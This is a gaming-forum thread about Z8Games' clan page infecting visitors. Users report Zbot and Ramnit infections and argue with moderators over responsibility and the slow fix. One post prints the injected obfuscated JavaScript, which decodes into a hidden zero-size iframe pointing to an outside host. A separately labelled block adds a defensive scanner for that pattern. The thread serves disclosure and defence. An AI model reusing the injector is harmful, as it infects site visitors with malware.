Concerning the clan page; PLEASE READ

13 Comments

  • [MOD]dot wrote: »
    menu.js looks clean to me, and the file obviously shouldn't differ at all unless there's something else in play.
    What does everyone else see?

    A lot of anti-virus systems picked up a virus when going to the clan page. Have you scanned other files?
  • abel95 wrote: »
    A lot of anti-virus systems picked up a virus when going to the clan page. Have you scanned other files?
    I know what happens.
    People are referencing the menu.js file as a source with "poorly hidden code in it", I'm inquiring as to where this code is in the file since the copy I'm reading is very basic and clean.
  • I suggest that the site administrators close the site until they solve the problem with the virus! Shame, z8!
  • I got the virus :[ AVG said it was Zbot.g; it would pop up with like 5 infected files and suggest "healing" them, but once that was done another 5 or so would pop up, over and over again. I read online somewhere that zbot.g is used to allow hackers to have a backdoor into your computer so they can then download any other type of virus onto it. Also, the suggested way to get rid of the virus was to just do a system restore, as it would continue to corrupt files just trying to use an antivirus program.
  • var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61!34!104!116!116!112!58!47!47!119!119!119!50!46!109!99!103!114!101!103!97!114!116!46!99!111!109!47!105!110!46!99!103!105!63!50!34!32!119!105!100!116!104!61!48!32!104!101!105!103!104!116!61!48!32!102!114!97!109!101!98!111!114!100!101!114!61!48!62!60!47!105!102!114!97!109!101!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);

    Piece of z8 JavaScript with Trojan.JS.Redirector.kp

    z8, we are doing the work for you!

    PS Is your antivirus Alert now? ;)
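
Added example, not part of any post in this thread: a static check a site operator could run over served .js files to catch the pattern in the snippet above, a quoted run of delimiter-separated character codes that decodes to a zero-size iframe. The function names and the example.invalid sample are constructed for illustration; the suspect string is only decoded as data, and the URL is defanged before it is reported.

```javascript
// Added example: static triage for char-code-obfuscated iframe injection.
// The suspect string is decoded as data only; nothing from it is executed.

// Quoted string of >= 9 decimal codes sharing one delimiter, e.g. "60!105!102!...".
const BLOB_RE = /(["'])(\d{1,3}([^\d\s"'\\])(?:\d{1,3}\3){8,}\d{0,3})\1/g;

function decodeBlob(body, delimiter) {
  return body.split(delimiter).filter(Boolean)
    .map((n) => String.fromCharCode(Number(n))).join("");
}

// Make a URL non-clickable before it goes into a ticket or forum post.
function defang(url) {
  return url.replace(/^http/i, "hxxp").replace(/\./g, "[.]");
}

// Read one attribute value (quoted or bare) out of a single HTML tag.
function attr(tag, name) {
  const m = new RegExp("\\b" + name + "\\s*=\\s*[\"']?([^\"'\\s>]+)", "i").exec(tag);
  return m ? m[1] : null;
}

const isZero = (v) => v !== null && /^0(px|%)?$/i.test(v);

function scanScript(source) {
  const findings = [];
  // Sinks that would turn the decoded string into live markup or code.
  const hasSink = /document\.write|innerHTML|eval\s*\(/.test(source);
  for (const m of source.matchAll(BLOB_RE)) {
    const decoded = decodeBlob(m[2], m[3]);
    const found = /<iframe\b[^>]*>/i.exec(decoded);
    if (!found) continue;
    const tag = found[0];
    const src = attr(tag, "src");
    findings.push({
      delimiter: m[3],
      hidden: isZero(attr(tag, "width")) || isZero(attr(tag, "height")) ||
        /display\s*:\s*none/i.test(tag),
      src: src ? defang(src) : null,
      hasSink,
    });
  }
  return findings;
}

// Constructed sample input (placeholder host), same shape as the posted snippet.
const SAMPLE_HTML =
  '<iframe src="http://example.invalid/placeholder" width=0 height=0 frameborder=0></iframe>';
const SAMPLE_JS = 'var str="' +
  Array.from(SAMPLE_HTML, (c) => c.charCodeAt(0)).join("!") +
  '!";/* decode loop omitted */document.write(out);';
// Constructed clean file for comparison.
const CLEAN_JS = 'function openMenu(id){document.getElementById(id).style.display="block";}';

console.log(scanScript(SAMPLE_JS), scanScript(CLEAN_JS));
```

Running the same scan against a known-good copy of each file from version control shows whether a finding is an injection or something the site ships on purpose.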
  • K well this is just a little annoying, I just spent about an hour writing out what happened in the approximate order that it happened, and when I was going to put the screenshots into the thread an ad popped up from imageshack and instead of exiting out of the ad, I accidentally exited out of the page. Not going to rewrite the approximate order.

    This is almost the exact problem I'm having, go to this thread to see:
    http://forum.avast.com/index.php?topic=82254.0
    I'm not doing the solution there because my situation is slightly different, and I could mess up my computer if I try it and it was wrong.



    I got a trojan from the clan page. You can see that from this screenshot:
    webpagehistory.png


    Originally I couldn't open up my antivirus (Microsoft Security Essentials) because the trojan/virus disabled it and kept it closed. I did scans with the updated version of malwarebytes, microsoft safety scan and nod32 online scanner:

    http://www.eset.com/us/online-scanner/
    http://www.malwarebytes.org/
    http://www.microsoft.com/security/scanner/en-us/default.aspx

    After deleting viruses then redeleting them (they just kept coming back), I restored my computer to 3 days ago, and microsoft security essentials started running again.

    I did a scan with it, and it picked up a bunch of viruses and 1 trojan. The viruses were named:
    virus:win32/Ramnit.AF
    and the trojan was named:
    Trojan:winNT/Ramnit.gen!A


    I kept deleting the viruses and their locations seemed random, however the trojan was located at:
    "C:\Users\basement\AppData\Local\Temp\<randomLettersHere>.sys"
    I know the letters were random based off the thread I quoted above:
    http://forum.avast.com/index.php?topic=82254.0


    I removed my scan history and then I tried running the scan again. Before this point the "action taken" in microsoft security essentials against the viruses was "allowed", and I couldn't change it to quarantined or deleted. I'm not sure when, but at some point it changed to quarantined, but that was after I couldn't find the trojan anymore, just the viruses (the trojan wasn't popping up in the history anymore).

    This is the trojan:
    http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Trojan%3AWinNT%2FRamnit.gen!A


    I tried navigating to it in CMD, however when I got to the Temp folder in "C:\Users\basement\AppData\Local\Temp\<randomLettersHere>.sys" and did a listing of the files, it didn't show up. I also tried navigating to it using the user interface, but the furthest I get is "C:\Users\basement". AppData isn't in there in the user interface, but it is in CMD, which leads me to believe it's hidden, and I'm unsure how to unhide it in Windows, plus even if I did I'm not sure if I would find the trojan.


    Here's the screenshot of the history in microsoft security essentials:
    historyf.png



    It should also be noted that I'm using version 5.0 of firefox (9.0 is the newest), because my brother wants to use an addon that doesn't work in the newer versions. I'll update it after this, and that may be the reason that I got the virus from the clan page.

    Near the beginning of this mess, I tried running firefox and then it would crash after about 5 seconds of being open. To correct this issue I had to run firefox in safemode, and then I could use it. I'm currently using firefox not on safemode and still have version 5.0.



    I want this fixed, and I've done all that I can, short of formatting the harddrive.

    If more information is required, just ask.
  • shoot this looks serious
    so... if i went on the clan page, but there was no request to accept whatsoever, im safe?
    im using the latest google chrome
    im scanning right now just to be safe
  • At the current time the Z8 forum is infected too, like the clan page.
    All requests to http://forum.z8games.com/showthread.php produce this WARNING
    01c15-adb814bc-b294-4826-a3e9-ab8990b8e137.png
  • At the current time the Z8 forum is infected too, like the clan page.

    Especially for people who didn't read the previous posts with the trojan code: read the posts!

    For z8 admins: this is the link the trojan script is redirecting to:
    <censored, what the hell are you thinking?>

    PS Dear admins, your job's done for you! Time to rewrite the scripts!
  • Wow, I seriously cannot believe this problem is still ongoing after more than 24 hours.

    I'm starting to suspect the person that did this is also the only person who has access to remove the code. Maybe he has been sacked, so now there is no one who has access to the file server to sort the problem out!

    We have provided the specific location of the offending script, where the hidden iframe is directing to and the files it is contained in, how hard is it to remove those lines?

    Impossible it would seem :confused:

    It might be a different story if it was affecting the ZP deposit page!
  • Yes downloading AdBlock while I was randomly sifting through the Google Chrome Store came in handy. >:]
  • CyberCatUK wrote: »
    Wow, I seriously cannot believe this problem is still ongoing after more than 24 hours.

    I'm starting to suspect the person that did this is also the only person who has access to remove the code. Maybe he has been sacked, so now there is no one who has access to the file server to sort the problem out!

    We have provided the specific location of the offending script, where the hidden iframe is directing to and the files it is contained in, how hard is it to remove those lines?

    Impossible it would seem :confused:

    It might be a different story if it was affecting the ZP deposit page!
    The problem was thought to have been solved with the removal of affected advertisements.
    The opposite has been brought to GM and technician attention and should be resolved shortly.


    I love how people jump on to conspiracy theories in a heartbeat though.
    Guess life isn't very interesting without them.
  • They dont give a F***!


    My pc is f..ucked up now again 2 hours of pain with formatting amazing JOB!
  • Just in case no one has read the new post from [GM]Saidin yet:
    http://forum.z8games.com/showpost.php?p=2677332&postcount=7
    Just a follow up. We took the ads off the clan page.

    However we did notice that it was still giving some virus warnings. This is coming from a 3rd party ad program that we had no control over.

    We're looking in to it and should have it fixed soon.
  • 'Lefi wrote:
    x[;2677339']They dont give a F***!


    My pc is f..ucked up now again 2 hours of pain with formatting amazing JOB!
    Well I hate to be a nudge but this could have happened to any webpage on the internet.
    Keeping your PC safe is ultimately your responsibility.

    A simple and free advertisement blocker like AdBlockPlus or probably even a half-decent antivirus stops this, as it's a very crude delivery system.
  • Apparently it's gone, at least from two of the clan page JS files now.

    Seriously, WHAT TOOK SO LONG?
  • [MOD]dot wrote: »
    Well I hate to be a nudge but this could have happened to any webpage on the internet.
    Keeping your PC safe is ultimately your responsibility.

    A simple and free advertisement blocker like AdBlockPlus or probably even a half-decent antivirus stops this, as it's a very crude delivery system.


    I have all of that (paying for it), and an interesting fact is that u first said it's "FALSE POSITIVE no worries", now u say it's my responsibility. I know what I'm doing on the internet and where I'm doing anything, but when something happens on a site like this and with a corporation like Z8, it's funny how u mods are trying to hide the truth! That's a fact u can't deny. I know u don't wanna make a more hysteric ambient, but lying isn't a solution and u know it!
  • [MOD]dot wrote: »
    The problem was thought to have been solved with the removal of affected advertisements.
    The opposite has been brought to GM and technician attention and should be resolved shortly.

    I love how people jump on to conspiracy theories in a heartbeat though.
    Guess life isn't very interesting without them.

    In a heartbeat? I don't know about you, but my heart beats faster than once in 24 hours.

    The right way of dealing with this was to remove the offending script first so the site is clean to use, then you can look at the adverts which are causing the issue while knowing no-one else is getting junk from this website.

    Once it is confirmed to be safe you can then put your adverts back in place. Not to leave the script in place and hope you can sort out the advertisements.

    At least Talonblaze had the right idea.
    the only issue currently is that the external site is the issue. which could probably be removed until fixed at the very least. the actual CF site doesn't seem to be the source as noted above, so whatever is in that frame is causing it.

    So again, why does it take more than 24 hours to remove a single line of code from a few files?
  • 'Lefi wrote:
    x[;2677354']I have all of that (paying for it), and an interesting fact is that u first said it's "FALSE POSITIVE no worries", now u say it's my responsibility. I know what I'm doing on the internet and where I'm doing anything, but when something happens on a site like this and with a corporation like Z8, it's funny how u mods are trying to hide the truth! That's a fact u can't deny. I know u don't wanna make a more hysteric ambient, but lying isn't a solution and u know it!
    False positive is a natural assumption.
    Most advertisements drop tracking cookies which some overly-eager antiviruses pick up.

    We aren't trying to hide anything, we don't know more than you and can only make more or less educated guesses.
    Guess another conspiracy theorist will go to bed unhappy..

    CyberCatUK wrote: »
    In a heartbeat? I don't know about you, but my heart beats faster than once in 24 hours.

    The right way of dealing with this was to remove the offending script first so the site is clean to use, then you can look at the adverts which are causing the issue while knowing no-one else is getting junk from this website.

    Once it is confirmed to be safe you can then put your adverts back in place. Not to leave the script in place and hope you can sort out the advertisements.

    At least Talonblaze had the right idea.



    So again, why does it take more than 24 hours to remove a single line of code from a few files?

    You expect me to actually give you a proper answer to why technicians I don't know on a company I'm not affiliated with aren't doing what you think they're supposed to?

    I can give you my point of view, as yet another mere bystander;
    Issue occurred in the middle of the night, technician time.
    Issue was thought to be resolved as soon as possible, with the removal of all advertisements.
    Later found that the issue wasn't resolved, technicians and GMs were again informed of the situation, and the issue should now soon be resolved in accordance with statement by Saidin.

    Not sure what else you want. Not like me writing some more essays on what happened is going to change anything.
    The internet is not safe, it's your responsibility to at least keep your computer safe.
    Deal with it.
  • [MOD]dot wrote: »
    Well I hate to be a nudge but this could have happened to any webpage on the internet.
    Keeping your PC safe is ultimately your responsibility.
    What are you trying to save face for? It's Z8/G4's responsibility to make sure that their webserver is secure.

    It could happen to any website on the internet.

    It should not happen to a website as large as Z8Games.

    I still have my doubts that it was caused by ads, but whatever.
  • TheBuzzer wrote: »
    What are you trying to save face for? It's Z8/G4's responsibility to make sure that their webserver is secure.

    It could happen to any website on the internet.

    It should not happen to a website as large as Z8Games.

    I still have my doubts that it was caused by ads, but whatever.
    Security is upheld by two parties.
    Provider, user.
    You yourself stated that it happens. The size of the site doesn't matter.

    This really doesn't interest me at all though. I use AdBlock+ which took me 5 seconds to install two years ago, so this horrible virus was of no consequence to me.

    People blaming something that could happen anywhere anytime and of course does, on Z8games, just rubs me the wrong way.

    The issue has been or is just about to be resolved, but of course, as soon as something's wrong with a G4 decision or Z8 event, there is the almighty hate-choir ready to sing.
  • [MOD]dot wrote: »
    You expect me to actually give you a proper answer to why technicians I don't know on a company I'm not affiliated with aren't doing what you think they're supposed to?

    Did I say I expect you specifically to provide an answer?

    Do the people who deal with it not speak English and cannot provide info on what they are doing?
    [MOD]dot wrote: »
    Issue occurred in the middle of the night, technician time.
    Issue was thought to be resolved as soon as possible, with the removal of all advertisements.

    It would have been resolved immediately if the offending script causing the adverts was removed first thing. Any decent website programmer would be able to sort that out.
    [MOD]dot wrote: »
    The internet is not safe, it's your responsibility to at least keep your computer safe.
    Deal with it.

    The website is the responsibility of z8games and they are responsible for providing a safe website for all to use. Sorry, but that statement is basically saying we can provide any junk/viruses we want and if you get any viruses from us, then it's all your fault.

    When people take the time to post about the issue with the site, where the problem lies and how it can be resolved quickly, people don't expect to simply be told, it's your fault, deal with it.

    Although not on the same scale, can you imagine if other websites which have been attacked started blaming their users if they had details stolen?
    "Well you provided us with your payment details for whatever, you should have known the internet isn't a safe place so now your details are in the hands of whoever. Tough, deal with it."
    I don't think that would quite go down very well.
  • [MOD]dot wrote: »
    Security is upheld by two parties.
    Provider, user.
    You yourself stated that it happens. The size of the site doesn't matter.

    This really doesn't interest me at all though. I use AdBlock+ which took me 5 seconds to install two years ago, so this horrible virus was of no consequence to me.

    People blaming something that could happen anywhere anytime and of course does, on Z8games, just rubs me the wrong way.

    The issue has been or is just about to be resolved, but of course, as soon as something's wrong with a G4 decision or Z8 event, there is the almighty hate-choir ready to sing.

    Sure it happens. But it's quite stupid that people high up on the food chain knew about this and it STILL took over 24 hours to get fixed.

    A similar thing like this happened once to a website I host for some friends. I assumed they were keeping up with software updates for the packages they were using, but apparently not, because someone got in and modified a few js files. As soon as I was notified about this, I took the site down, cleaned up the files, fixed the vulnerability in the software, and had the site back online. This took all of 15 minutes, and now I make damn sure they keep after their updates.

    The size of the site does matter too. A site with as many visitors as Z8 should absolutely ensure that their software is secure, all the way from the underlying OS to the actual web-facing application, and it especially should not take 24 hours to get something like this removed when it's discovered. I don't care if the technicians are asleep, call them and wake them up.

    If I was the guy responsible for site security and this happened on my watch, I'd feel like garbage.
  • [MOD]dot wrote: »
    False positive is a natural assumption.
    Most advertisements drop tracking cookies which some overly-eager antiviruses pick up.

    We aren't trying to hide anything, we don't know more than you and can only make more or less educated guesses.
    Guess another conspiracy theorist will go to bed unhappy..

    I don't believe in any conspiracy so pls don't refer to me with that! Just saying what I saw! :rolleyes:
  • TheBuzzer wrote: »
    Sure it happens. But it's quite stupid that people high up on the food chain knew about this and it STILL took over 24 hours to get fixed.

    A similar thing like this happened once to a website I host for some friends. I assumed they were keeping up with software updates for the packages they were using, but apparently not, because someone got in and modified a few js files. As soon as I was notified about this, I took the site down, cleaned up the files, fixed the vulnerability in the software, and had the site back online. This took all of 15 minutes, and now I make damn sure they keep after their updates.

    The size of the site does matter too. A site with as many visitors as Z8 should absolutely ensure that their software is secure, all the way from the underlying OS to the actual web-facing application, and it especially should not take 24 hours to get something like this removed when it's discovered. I don't care if the technicians are asleep, call them and wake them up.

    If I was the guy responsible for site security and this happened on my watch, I'd feel like garbage.

    Same here! But that's Z8 ;) (don't get me wrong, I'm talking about how long it takes to fix things!)
  • doing a full system scan now, found 6 bad files so far
This discussion has been closed.